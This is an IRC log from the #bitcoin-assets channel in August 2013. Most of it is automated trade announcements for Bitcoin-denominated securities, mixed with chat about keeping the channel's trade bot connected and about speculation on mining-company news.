[BTCTC] [LABCOIN] 50 @ 0.003658 = 0.1829 BTC [-] Aug 26 13:14:08 [BTCTC] [DMS.MINING] 1 @ 0.0033 BTC [-] Aug 26 13:26:02 seems impossible to keep assbot up for more than 5 minutes these days.. Aug 26 13:31:28 kakobrekla is it getting ddosed ? Aug 26 14:04:19 there aren't that many trades… why is it failing? Aug 26 14:05:01 do exchanges provide a "live" feed or do you have to request all the time? Aug 26 14:05:45 pankkake: Depends on the exchange I thikn Aug 26 14:06:22 assbot is getting pushed to afaik Aug 26 14:09:03 http://bitcoin-assets.com/mpex-socket/ that looks pretty cool Aug 26 14:09:10 MPEX Socket | #bitcoin-assets Aug 26 14:09:23 I was wondering if I could hack a quick alternative using irker Aug 26 14:09:55 you probably can. there's also mpexbot that's active atm Aug 26 14:10:44 the "realtime" of btct does not seem to be real time Aug 26 14:10:56 well… it's refreshing every few seconds Aug 26 14:11:06 the whole thing Aug 26 14:14:22 burnside ever comes here? Aug 26 14:18:50 gecko_x2 occasionally. Aug 26 14:20:28 what's the best way to reach him as an outsider.. forum pm? Aug 26 14:20:31 i guess Aug 26 14:21:10 just have a few technical suggestions about improving the platform.. Aug 26 14:21:39 pm here, pm on forum, i think he has an email somewhere Aug 26 14:21:54 ;;seen burnside Aug 26 14:21:54 burnside was last seen in #bitcoin-assets 4 weeks, 4 days, 16 hours, 46 minutes, and 37 seconds ago: lol Aug 26 14:22:03 heh i guess he's not really coming by Aug 26 14:22:37 I have had success PM'ing him on Bitcointalk.org. **** BEGIN LOGGING AT Mon Aug 26 14:33:59 2013 Aug 26 14:46:17 not sure Aug 26 14:46:23 i will investigate when i come home Aug 26 14:46:28 tomorrow or so. Aug 26 14:46:54 i think it has to do with freenode Aug 26 14:46:54 [BTCTC] [LABCOIN] 20 @ 0.003484 = 0.0697 BTC [-] Aug 26 14:47:10 brb Aug 26 14:48:17 [BTCTC] [LABCOIN] 10 @ 0.003483 = 0.0348 BTC [-] Aug 26 14:49:40 [BTCTC] [LABCOIN] 10 @ 0.003483 = 0.0348 BTC [-] Aug 26 14:49:42 [BTCTC] [LABCOIN] 21 @ 0.003433 = 0.0721 BTC [-] Aug 26 14:49:43 [BTCTC] [LABCOIN] 49 @ 0.003432 = 0.1682 BTC [-] Aug 26 14:50:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02668 BTC [+] Aug 26 14:50:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.02667 BTC [-] Aug 26 14:50:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0265 = 0.0795 BTC [-] Aug 26 14:51:08 http://www.slate.com/articles/health_and_science/science/2013/08/nsa_domestic_spying_mathematicians_should_speak_out.html Aug 26 14:51:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02712 BTC [+] Aug 26 14:51:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02713 BTC [+] Aug 26 14:51:10 NSA domestic spying: Mathematicians should speak out. - Slate Magazine Aug 26 14:51:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.02716 = 0.1358 BTC [+] Aug 26 14:51:11 [BTCTC] [TAT.ASICMINER] 18 @ 0.02717 = 0.4891 BTC [+] Aug 26 14:51:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02711 BTC [-] Aug 26 14:51:16 [BTCTC] [TAT.ASICMINER] 32 @ 0.02717 = 0.8694 BTC [+] Aug 26 14:51:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02718 BTC [+] Aug 26 14:52:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.02719 BTC [+] Aug 26 14:52:00 [BTCTC] [TAT.ASICMINER] 18 @ 0.0272 = 0.4896 BTC [+] Aug 26 14:53:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0272 BTC [+] Aug 26 14:53:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02725 BTC [+] Aug 26 14:53:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02743 = 0.1372 BTC [+] Aug 26 14:56:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.0278 = 0.1668 BTC [+] Aug 26 14:57:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00109 BTC [+] Aug 26 14:57:54 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.001091 = 0.108 BTC [+] Aug 26 14:59:04 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 26 14:59:05 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 26 14:59:18 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0011 = 0.11 BTC [+] Aug 26 14:59:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0011 BTC [+] Aug 26 14:59:21 [BTCTC] [TAT.VIRTUALMINE] 256 @ 0.001134 = 0.2903 BTC [+] Aug 26 14:59:57 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001134 = 0.0045 BTC [+] Aug 26 14:59:59 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 26 15:00:24 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Aug 26 15:02:30 [HAVELOCK] [XBOND] 1 @ 0.00117 BTC [+] Aug 26 15:02:33 [BTCTC] [LTC-ATF.B2] 5 @ 0.01043 = 0.0522 BTC [+] Aug 26 15:02:50 [HAVELOCK] [SMG] 18 @ 0.00021483 = 0.0039 BTC [-] Aug 26 15:06:16 pankkake socket works even if assbot is down Aug 26 15:07:07 I tried to use it but it requires a login? Aug 26 15:07:13 [BTCTC] [ASICMINER-PT] 1 @ 2.946 BTC [-] Aug 26 15:07:22 indeed Aug 26 15:07:38 [BTCTC] [NASTY-PT] 10 @ 0.002279 = 0.0228 BTC [+] Aug 26 15:07:38 what pankkake socket? Aug 26 15:07:44 haha Aug 26 15:07:54 lol, yeah Aug 26 15:07:57 oh, lol Aug 26 15:08:03 i was confused too Aug 26 15:08:07 even googled it :D Aug 26 15:08:11 lol Aug 26 15:08:13 normally there is a comma or colon for auto completes, haha Aug 26 15:08:18 what to use for querying the API? Aug 26 15:08:18 I totally did =D Aug 26 15:08:20 ;;google pankkake socket Aug 26 15:08:20 skink pinhole pancake - homepage & blog skinkphoto ...: ; muncie / anderson tools - by owner classifieds - craigslist: ; Pancake Tension & Compression Load Cell: Aug 26 15:08:29 is there any client avail? Aug 26 15:08:33 [BTCTC] [LABCOIN] 24 @ 0.00345700 = 0.08296800 Aug 26 15:08:34 [BTCTC] [LABCOIN] 2700 @ 0.00341300 = 9.21510000 Aug 26 15:08:35 [BTCTC] [ACTIVEMINING] 237 @ 0.00508700 = 1.20561900 Aug 26 15:08:36 [BTCTC] [ACTIVEMINING] 500 @ 0.00508500 = 2.54250000 Aug 26 15:08:37 [BTCTC] [ACTIVEMINING] 420 @ 0.00508200 = 2.13444000 Aug 26 15:08:38 [BTCTC] [BASIC-MINING] 1 @ 0.21300000 = 0.21300000 Aug 26 15:08:39 [BTCTC] [BITVPS] 27 @ 0.00250000 = 0.06750000 Aug 26 15:08:40 [BTCTC] [DMS.PURCHASE] 5 @ 0.01606000 = 0.08030000 Aug 26 15:08:40 oops Aug 26 15:08:41 [BTCTC] [DMS.MINING] 108 @ 0.00341300 = 0.36860400 Aug 26 15:08:42 [BTCTC] [LABCOIN] 43 @ 0.00362400 = 0.15583200 Aug 26 15:08:43 [BTCTC] [ACTIVEMINING] 6 @ 0.00510300 = 0.03061800 Aug 26 15:08:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00102100 = 0.01021000 Aug 26 15:08:45 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.00102000 = 0.03060000 Aug 26 15:08:46 [BTCTC] [DMS.MINING] 499 @ 0.00339800 = 1.69560200 Aug 26 15:08:47 [BTCTC] [DMS.MINING] 1019 @ 0.00339900 = 3.46358100 Aug 26 15:08:48 [BTCTC] [ASICMINER-PT] 3 @ 2.88000000 = 8.64000000 Aug 26 15:08:49 [BTCTC] [ASICMINER-PT] 3 @ 2.89900000 = 8.69700000 Aug 26 15:08:50 [BTCTC] [ASICMINER-PT] 10 @ 2.90000000 = 29.00000000 Aug 26 15:08:51 [BTCTC] [ASICMINER-PT] 1 @ 2.91000000 = 2.91000000 Aug 26 15:08:52 [BTCTC] [ASICMINER-PT] 1 @ 2.92000000 = 2.92000000 Aug 26 15:08:53 [BTCTC] [ASICMINER-PT] 1 @ 2.95000000 = 2.95000000 Aug 26 15:08:59 dafuq Aug 26 15:09:02 lol Aug 26 15:09:10 it's my buttbot Aug 26 15:09:13 [BTCTC] [ASICMINER-PT] 1 @ 2.947 BTC [+] Aug 26 15:09:14 [BTCTC] [ASICMINER-PT] 1 @ 2.948 BTC [+] Aug 26 15:09:15 [BTCTC] [ASICMINER-PT] 2 @ 2.965 = 5.93 BTC [+] Aug 26 15:09:16 [BTCTC] [ASICMINER-PT] 2 @ 2.976 = 5.952 BTC [+] Aug 26 15:09:18 How do the bots get their info? Aug 26 15:09:34 through the api Aug 26 15:09:41 assbot uses crystal ball Aug 26 15:09:44 for others dunno Aug 26 15:09:50 I am making an android app for quick looks when I am not at my computer, and I am using the API right now. Didn't know if there was a better method Aug 26 15:10:04 [BTCTC] [DMS.PURCHASE] 58 @ 0.01606 = 0.9315 BTC [+] Aug 26 15:10:41 ill make some changes this week so assbot will reconnect automagically if it goes down Aug 26 15:10:45 that was very easy to write though: http://pastebin.com/EzjYtLmG Aug 26 15:11:06 to output a bunch of IRC lines, irker is good Aug 26 15:11:15 (re)connects automatically and all Aug 26 15:11:17 [HAVELOCK] [AM100] 40 @ 0.0269899 = 1.0796 BTC [-] Aug 26 15:11:22 irk() lol? Aug 26 15:11:44 http://www.catb.org/esr/irker/ Aug 26 15:11:46 Resource page for irker 1.20 Aug 26 15:11:51 [BTCTC] [LABCOIN] 2 @ 0.003447 = 0.0069 BTC [+] Aug 26 15:11:53 [BTCTC] [LABCOIN] 2 @ 0.003446 = 0.0069 BTC [-] Aug 26 15:11:54 [BTCTC] [LABCOIN] 5 @ 0.003443 = 0.0172 BTC [-] Aug 26 15:11:55 [BTCTC] [LABCOIN] 20 @ 0.003442 = 0.0688 BTC [-] Aug 26 15:11:56 [BTCTC] [LABCOIN] 9 @ 0.003433 = 0.0309 BTC [-] Aug 26 15:11:58 [BTCTC] [LABCOIN] 36 @ 0.003432 = 0.1236 BTC [-] Aug 26 15:11:59 [BTCTC] [LABCOIN] 500 @ 0.003421 = 1.7105 BTC [-] Aug 26 15:12:00 [BTCTC] [LABCOIN] 26 @ 0.00342 = 0.0889 BTC [-] Aug 26 15:12:00 [BTCTC] [DMS.MINING] 40 @ 0.003425 = 0.137 BTC [+] Aug 26 15:12:22 assbot is custom from ground up Aug 26 15:12:37 Also, is there a 'limit' on how much you should poll the API? Aug 26 15:12:45 writing a proper irc client is hard Aug 26 15:12:55 assbot doesnt do pull, it gets pushes Aug 26 15:13:12 cause its so awesome Aug 26 15:13:44 Oh that's nice, so it uses something else besides the API? since it gets the data pushed to it Aug 26 15:13:50 pankkake thx for that link Aug 26 15:14:42 [BTCTC] [ASICMINER-PT] 1 @ 2.968 BTC [-] Aug 26 15:14:55 [BTCTC] [COGNITIVE] 2 @ 0.295 = 0.59 BTC [+] Aug 26 15:15:19 [BTCTC] [ASICMINER-PT] 1 @ 2.969 BTC [+] Aug 26 15:15:33 [BTCTC] [LABCOIN] 5 @ 0.003425 = 0.0171 BTC [+] Aug 26 15:15:34 [BTCTC] [LABCOIN] 5 @ 0.003424 = 0.0171 BTC [-] Aug 26 15:15:35 [BTCTC] [LABCOIN] 20 @ 0.003423 = 0.0685 BTC [-] Aug 26 15:15:37 [BTCTC] [LABCOIN] 514 @ 0.003423 = 1.7594 BTC [-] Aug 26 15:15:38 [BTCTC] [LABCOIN] 956 @ 0.00342 = 3.2695 BTC [-] Aug 26 15:16:08 [BTCTC] [DMS.SELLING] 317 @ 0.01235 = 3.915 BTC [+] Aug 26 15:16:16 [BTCTC] [DMS.PURCHASE] 35 @ 0.01606 = 0.5621 BTC [+] Aug 26 15:16:17 [BTCTC] [LABCOIN] 40 @ 0.003421 = 0.1368 BTC [+] Aug 26 15:16:55 [BTCTC] [DMS.SELLING] 183 @ 0.01235 = 2.2601 BTC [+] Aug 26 15:16:57 Doctor_Andonuts what do you mean? assbot has an api which exchanges use to post stuff here. Aug 26 15:16:57 [BTCTC] [DMS.SELLING] 30 @ 0.01234 = 0.3702 BTC [-] Aug 26 15:16:58 [BTCTC] [DMS.SELLING] 13 @ 0.01233 = 0.1603 BTC [-] Aug 26 15:16:59 [BTCTC] [DMS.SELLING] 274 @ 0.01232 = 3.3757 BTC [-] Aug 26 15:17:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.02827 = 0.0565 BTC [+] Aug 26 15:17:01 [BTCTC] [ASICMINER-PT] 1 @ 2.97 BTC [+] Aug 26 15:17:02 [BTCTC] [ASICMINER-PT] 1 @ 2.975 BTC [+] Aug 26 15:17:04 [BTCTC] [ASICMINER-PT] 1 @ 2.976 BTC [+] Aug 26 15:17:05 [BTCTC] [ASICMINER-PT] 1 @ 2.978 BTC [+] Aug 26 15:17:24 Ahh, so the otherway around, instead of it using the sites API. That makes sense Aug 26 15:17:56 [BTCTC] [DMS.SELLING] 200 @ 0.01223 = 2.446 BTC [-] Aug 26 15:17:56 [BTCTC] [DMS.SELLING] 63 @ 0.01221 = 0.7692 BTC [-] Aug 26 15:18:08 [BTCTC] [ASICMINER-PT] 1 @ 2.978 BTC [+] Aug 26 15:18:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02827 = 0.0565 BTC [+] Aug 26 15:18:44 [BTCTC] [TAT.MINIGAME] 109 @ 0.000235 = 0.0256 BTC [-] Aug 26 15:18:46 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002222 = 0.0444 BTC [-] Aug 26 15:18:47 [BTCTC] [TAT.MINIGAME] 500 @ 0.000222 = 0.111 BTC [-] Aug 26 15:18:48 [BTCTC] [TAT.MINIGAME] 2191 @ 0.000215 = 0.4711 BTC [-] Aug 26 15:19:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02828 = 0.0566 BTC [+] Aug 26 15:19:44 oic Aug 26 15:19:50 [BTCTC] [DMS.PURCHASE] 40 @ 0.01606 = 0.6424 BTC [+] Aug 26 15:20:02 [BTCTC] [TAT.ASICMINER] 30 @ 0.0283 = 0.849 BTC [+] Aug 26 15:20:11 but yeah, plz make the bot autorejoin :D Aug 26 15:20:33 yesterday there were several loong interruptions :p Aug 26 15:20:43 i dunno whats been going on for past few days Aug 26 15:20:56 ic Aug 26 15:20:58 [BTCTC] [LABCOIN] 5 @ 0.003427 = 0.0171 BTC [+] Aug 26 15:21:08 i suspect freenode did some changes or something Aug 26 15:21:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.0284 = 0.0568 BTC [+] Aug 26 15:21:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02889 = 0.1445 BTC [+] Aug 26 15:21:46 [BTCTC] [LABCOIN] 21 @ 0.003426 = 0.0719 BTC [-] Aug 26 15:21:47 [BTCTC] [TAT.ASICMINER] 25 @ 0.0289 = 0.7225 BTC [+] Aug 26 15:21:49 [BTCTC] [LABCOIN] 21 @ 0.003425 = 0.0719 BTC [-] Aug 26 15:21:50 can you switch servers automatically for redundancy? Aug 26 15:21:50 [HAVELOCK] [XBOND] 5 @ 0.001169 = 0.0058 BTC [-] Aug 26 15:21:52 [BTCTC] [LABCOIN] 208 @ 0.003421 = 0.7116 BTC [-] Aug 26 15:22:06 [HAVELOCK] [XBOND] 1 @ 0.00111111 BTC [-] Aug 26 15:22:08 i mean do you have a list of freenode servers set up, or just 1 Aug 26 15:22:24 [HAVELOCK] [XBOND] 4 @ 0.00110999 = 0.0044 BTC [-] Aug 26 15:22:26 currently i resolve irc.freenode.net as i connect which gives you different severs at different times Aug 26 15:22:35 [BTCTC] [ASICMINER-PT] 1 @ 2.977 BTC [-] Aug 26 15:22:38 right Aug 26 15:22:42 [HAVELOCK] [XBOND] 50 @ 0.00110001 = 0.055 BTC [-] Aug 26 15:22:59 [BTCTC] [ASICMINER-PT] 8 @ 2.978 = 23.824 BTC [+] Aug 26 15:23:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.02909 = 0.0582 BTC [+] Aug 26 15:23:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02909 BTC [+] Aug 26 15:23:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0291 BTC [+] Aug 26 15:23:31 [BTCTC] [TAT.ASICMINER] 11 @ 0.02912 = 0.3203 BTC [+] Aug 26 15:23:54 ;;ticker Aug 26 15:23:55 MtGox BTCUSD ticker | Best bid: 121.55557, Best ask: 121.92000, Bid-ask spread: 0.36443, Last trade: 121.55556, 24 hour volume: 8613.88182382, 24 hour low: 120.45121, 24 hour high: 122.99000, 24 hour vwap: 122.02255 Aug 26 15:24:04 ill also setup some url which will be given to a few people, upon visiting teh url i will receive sms message Aug 26 15:24:08 just gotta get home first Aug 26 15:24:14 [BTCTC] [TAT.ASICMINER] 55 @ 0.02913 = 1.6022 BTC [+] Aug 26 15:24:21 http://freenode.net/irc_servers.shtml Aug 26 15:24:24 About freenode: IRC Servers Aug 26 15:24:37 then you can ping me at any time Aug 26 15:24:50 [HAVELOCK] [XBOND] 3 @ 0.0011 = 0.0033 BTC [-] Aug 26 15:24:53 [HAVELOCK] [XBOND] 19 @ 0.0011 = 0.0209 BTC [-] Aug 26 15:24:57 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [-] Aug 26 15:25:00 [HAVELOCK] [XBOND] 20 @ 0.0011 = 0.022 BTC [-] Aug 26 15:25:03 [HAVELOCK] [XBOND] 9 @ 0.00109992 = 0.0099 BTC [-] Aug 26 15:25:07 [HAVELOCK] [XBOND] 1 @ 0.00109991 BTC [-] Aug 26 15:25:10 [BTCTC] [TAT.ASICMINER] 16 @ 0.0292 = 0.4672 BTC [+] Aug 26 15:25:12 [HAVELOCK] [XBOND] 338 @ 0.00109101 = 0.3688 BTC [-] Aug 26 15:25:15 [BTCTC] [TAT.ASICMINER] 70 @ 0.0292 = 2.044 BTC [+] Aug 26 15:25:33 [BTCTC] [LTC-ATF.B2] 5 @ 0.01043 = 0.0522 BTC [+] Aug 26 15:26:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.029 = 1.45 BTC [-] Aug 26 15:26:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.0289 = 0.0867 BTC [-] Aug 26 15:26:27 [HAVELOCK] [AM100] 6 @ 0.026999 = 0.162 BTC [+] Aug 26 15:26:45 [HAVELOCK] [XBOND] 14 @ 0.00117 = 0.0164 BTC [+] Aug 26 15:27:00 [HAVELOCK] [AM100] 4 @ 0.027 = 0.108 BTC [+] Aug 26 15:27:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.02912 = 0.2912 BTC [+] Aug 26 15:28:34 [HAVELOCK] [AM100] 9 @ 0.027 = 0.243 BTC [+] Aug 26 15:28:55 [HAVELOCK] [XBOND] 1 @ 0.00117 BTC [+] Aug 26 15:29:19 [BTCTC] [ACTIVEMINING] 9 @ 0.0052 = 0.0468 BTC [+] Aug 26 15:29:20 [BTCTC] [ACTIVEMINING] 2 @ 0.005105 = 0.0102 BTC [-] Aug 26 15:29:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005104 = 0.051 BTC [-] Aug 26 15:29:23 [BTCTC] [ACTIVEMINING] 52 @ 0.005103 = 0.2654 BTC [-] Aug 26 15:29:24 [BTCTC] [ACTIVEMINING] 3 @ 0.0051 = 0.0153 BTC [-] Aug 26 15:29:25 [BTCTC] [ACTIVEMINING] 174 @ 0.005064 = 0.8811 BTC [-] Aug 26 15:29:29 [HAVELOCK] [XBOND] 12 @ 0.00117 = 0.014 BTC [+] Aug 26 15:30:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.02915 = 0.583 BTC [+] Aug 26 15:30:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.02917 = 0.5834 BTC [+] Aug 26 15:31:04 [BTCTC] [BASIC-MINING] 1 @ 0.2101 BTC [-] Aug 26 15:31:06 [BTCTC] [BASIC-MINING] 4 @ 0.2101 = 0.8404 BTC [-] Aug 26 15:31:47 [BTCTC] [ACTIVEMINING] 4 @ 0.005105 = 0.0204 BTC [+] Aug 26 15:31:48 [BTCTC] [ACTIVEMINING] 117 @ 0.005064 = 0.5925 BTC [-] Aug 26 15:31:49 [BTCTC] [ACTIVEMINING] 379 @ 0.005063 = 1.9189 BTC [-] Aug 26 15:33:17 [BTCTC] [ASICMINER-PT] 1 @ 2.977 BTC [-] Aug 26 15:33:42 [MPEX] [S.MPOE] 1465 @ 0.0008645 = 1.2665 BTC [+] Aug 26 15:34:49 [BTCTC] [ASICMINER-PT] 1 @ 2.978 BTC [+] Aug 26 15:35:40 [BTCTC] [ASICMINER-PT] 1 @ 2.979 BTC [+] Aug 26 15:36:01 [BTCTC] [ASICMINER-PT] 1 @ 2.979 BTC [+] Aug 26 15:37:40 [BTCTC] [BITVPS] 250 @ 0.00253 = 0.6325 BTC [+] Aug 26 15:38:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.02916 = 0.0583 BTC [-] Aug 26 15:38:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.02916 = 0.1458 BTC [-] Aug 26 15:39:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.02916 = 0.2624 BTC [-] Aug 26 15:40:08 [BTCTC] [TAT.ASICMINER] 30 @ 0.02916 = 0.8748 BTC [-] Aug 26 15:40:33 [BTCTC] [ASICMINER-PT] 1 @ 2.975 BTC [-] Aug 26 15:40:37 [BTCTC] [BITVPS] 23 @ 0.002531 = 0.0582 BTC [+] Aug 26 15:41:30 [HAVELOCK] [SMG] 369 @ 0.00021483 = 0.0793 BTC [-] Aug 26 15:42:08 [HAVELOCK] [SDSTM] 1 @ 0.0035 BTC [+] Aug 26 15:42:23 [HAVELOCK] [SDSTM] 10 @ 0.0035 = 0.035 BTC [+] Aug 26 15:46:13 [BTCTC] [DMS.MINING] 139 @ 0.003425 = 0.4761 BTC [+] Aug 26 15:46:17 [BTCTC] [DMS.MINING] 12 @ 0.003425 = 0.0411 BTC [+] Aug 26 15:51:38 the forums went quiet Aug 26 15:51:49 everyone's just waiting for the news.. Aug 26 15:52:07 is that today? Aug 26 15:52:16 dunno Aug 26 15:52:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0292 BTC [+] Aug 26 15:52:25 'early this week' Aug 26 15:53:02 ie before or on wednesday Aug 26 15:54:04 what news? Aug 26 15:54:37 news of more news incoming Aug 26 15:54:58 news of the return of satoshi christ Aug 26 15:55:32 chips should arrive today (https://bitcointalk.org/index.php?topic=263445.msg2964842#msg2964842 "within a week" is over today), but that's not necessarily linked to an update today Aug 26 15:55:34 How many of you actually have other irl friends that invest into btc? Aug 26 15:55:34 [HAVELOCK] [AM100] 50 @ 0.0269 = 1.345 BTC [-] Aug 26 15:55:38 [BTCTC] [LABCOIN] 10 @ 0.003449 = 0.0345 BTC [+] Aug 26 15:55:39 [HAVELOCK] [AM100] 85 @ 0.027 = 2.295 BTC [+] Aug 26 15:55:41 [BTCTC] [LABCOIN] 10 @ 0.003448 = 0.0345 BTC [-] Aug 26 15:55:43 [BTCTC] [LABCOIN] 20 @ 0.003446 = 0.0689 BTC [-] Aug 26 15:55:44 [BTCTC] [LABCOIN] 122 @ 0.003441 = 0.4198 BTC [-] Aug 26 15:55:45 [BTCTC] [LABCOIN] 490 @ 0.00344 = 1.6856 BTC [-] Aug 26 15:55:46 [BTCTC] [LABCOIN] 254 @ 0.003421 = 0.8689 BTC [-] Aug 26 15:55:47 [BTCTC] [LABCOIN] 50 @ 0.003421 = 0.1711 BTC [-] Aug 26 15:55:47 [BTCTC] [LABCOIN] 1018 @ 0.00342 = 3.4816 BTC [-] Aug 26 15:55:48 [BTCTC] [LABCOIN] 202 @ 0.0034 = 0.6868 BTC [-] Aug 26 15:55:49 [BTCTC] [LABCOIN] 810 @ 0.003399 = 2.7532 BTC [-] Aug 26 15:55:54 hmmm Aug 26 15:56:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.02916 = 0.2624 BTC [-] Aug 26 15:58:10 [BTCTC] [LABCOIN] 187 @ 0.00339 = 0.6339 BTC [-] Aug 26 15:58:11 [BTCTC] [LABCOIN] 67 @ 0.00339 = 0.2271 BTC [-] Aug 26 15:58:13 [BTCTC] [LABCOIN] 496 @ 0.003389 = 1.6809 BTC [-] Aug 26 15:58:21 asicminer is hashing again with nearly 80 th/s in the last 6 hours (was very much lower the last days). wouldn't be surprised, if am gets some attention today Aug 26 15:58:26 [BTCTC] [LABCOIN] 100 @ 0.003389 = 0.3389 BTC [-] Aug 26 15:58:41 [BTCTC] [LABCOIN] 154 @ 0.003389 = 0.5219 BTC [-] Aug 26 15:59:10 [BTCTC] [LABCOIN] 66 @ 0.00337 = 0.2224 BTC [-] Aug 26 15:59:13 careful looking at the 6-hour avg, it's usually useless Aug 26 15:59:37 [BTCTC] [LABCOIN] 264 @ 0.003369 = 0.8894 BTC [-] Aug 26 15:59:40 just saying, it looks like they restarted their rigs Aug 26 16:00:11 [BTCTC] [LABCOIN] 60 @ 0.003351 = 0.2011 BTC [-] Aug 26 16:00:38 [BTCTC] [LABCOIN] 87 @ 0.003351 = 0.2915 BTC [-] Aug 26 16:03:26 could just be luck Aug 26 16:03:45 I made a good bit off am when it dropped to 2.25 Aug 26 16:04:18 [BTCTC] [LABCOIN] 20 @ 0.00336 = 0.0672 BTC [+] Aug 26 16:04:33 [BTCTC] [ACTIVEMINING] 8 @ 0.005101 = 0.0408 BTC [+] Aug 26 16:04:34 [BTCTC] [ACTIVEMINING] 95 @ 0.0051 = 0.4845 BTC [-] Aug 26 16:04:36 [BTCTC] [ACTIVEMINING] 924 @ 0.00507 = 4.6847 BTC [-] Aug 26 16:04:42 [BTCTC] [TAT.ASICMINER] 30 @ 0.02889 = 0.8667 BTC [-] Aug 26 16:05:42 https://bitcointalk.org/index.php?topic=263445.msg2983327#msg2983327 << also this ("joint news release with easic and activemining expected by monday"), but most likely trolling Aug 26 16:05:47 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Aug 26 16:06:43 Things like these is why I need btct bot Aug 26 16:06:45 Ken even said that he did not even have word of when they would do a joint release, so I'd say for sure VE trolling in that regard. Aug 26 16:06:56 sell these, buy @ this right after... etc etc Aug 26 16:07:33 VE is playing the fields in both actM and labcoin Aug 26 16:09:22 he should invest in General Electric and retire :p Aug 26 16:11:56 [BTCTC] [LABCOIN] 20 @ 0.003361 = 0.0672 BTC [+] Aug 26 16:11:57 [BTCTC] [LABCOIN] 138 @ 0.00336 = 0.4637 BTC [-] Aug 26 16:12:50 logging in.. Aug 26 16:13:07 there is no such a thing as a btct terminal. Aug 26 16:13:10 just a website. Aug 26 16:13:17 getting ready to punch in that 2FA code on a massive buy.. :p Aug 26 16:13:54 [BTCTC] [TAT.ASICMINER] 37 @ 0.02889 = 1.0689 BTC [-] Aug 26 16:13:58 [BTCTC] [TAT.MINIGAME] 100 @ 0.000264 = 0.0264 BTC [+] Aug 26 16:13:59 [BTCTC] [LABCOIN] 5 @ 0.003361 = 0.0168 BTC [+] Aug 26 16:13:59 [BTCTC] [LABCOIN] 395 @ 0.00336 = 1.3272 BTC [-] Aug 26 16:14:22 [BTCTC] [ASICMINER-PT] 1 @ 2.975 BTC [-] Aug 26 16:15:01 [BTCTC] [TAT.ASICMINER] 60 @ 0.0289 = 1.734 BTC [+] Aug 26 16:15:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.0289 = 0.2601 BTC [+] Aug 26 16:16:49 [BTCTC] [LABCOIN] 840 @ 0.00336 = 2.8224 BTC [-] Aug 26 16:16:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0289 = 0.289 BTC [+] Aug 26 16:17:15 [BTCTC] [ASICMINER-PT] 1 @ 2.978 BTC [+] Aug 26 16:17:18 [BTCTC] [TAT.ASICMINER] 47 @ 0.0289 = 1.3583 BTC [+] Aug 26 16:17:29 [HAVELOCK] [LABCO] 24 @ 0.0029 = 0.0696 BTC [-] Aug 26 16:18:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.02919 = 0.146 BTC [+] Aug 26 16:18:33 [BTCTC] [ASICMINER-PT] 1 @ 2.978 BTC [+] Aug 26 16:18:34 [BTCTC] [ASICMINER-PT] 2 @ 2.978 = 5.956 BTC [+] Aug 26 16:18:35 [BTCTC] [ASICMINER-PT] 14 @ 2.979 = 41.706 BTC [+] Aug 26 16:18:37 [BTCTC] [ASICMINER-PT] 2 @ 2.98 = 5.96 BTC [+] Aug 26 16:18:38 [BTCTC] [ASICMINER-PT] 31 @ 2.98 = 92.38 BTC [+] Aug 26 16:18:39 [BTCTC] [ASICMINER-PT] 1 @ 2.98 BTC [+] Aug 26 16:19:14 [BTCTC] [ASICMINER-PT] 1 @ 2.977 BTC [-] Aug 26 16:19:43 [HAVELOCK] [AM1] 1 @ 2.78999999 BTC [+] Aug 26 16:19:47 [HAVELOCK] [AM1] 1 @ 2.79 BTC [+] Aug 26 16:19:51 [HAVELOCK] [AM1] 5 @ 2.8 = 14 BTC [+] Aug 26 16:19:54 [HAVELOCK] [AM1] 1 @ 2.88 BTC [+] Aug 26 16:19:56 [BTCTC] [LABCOIN] 3642 @ 0.00336 = 12.2371 BTC [-] Aug 26 16:19:58 [HAVELOCK] [AM1] 3 @ 2.89 = 8.67 BTC [+] Aug 26 16:20:01 [HAVELOCK] [AM1] 1 @ 2.8979 BTC [+] 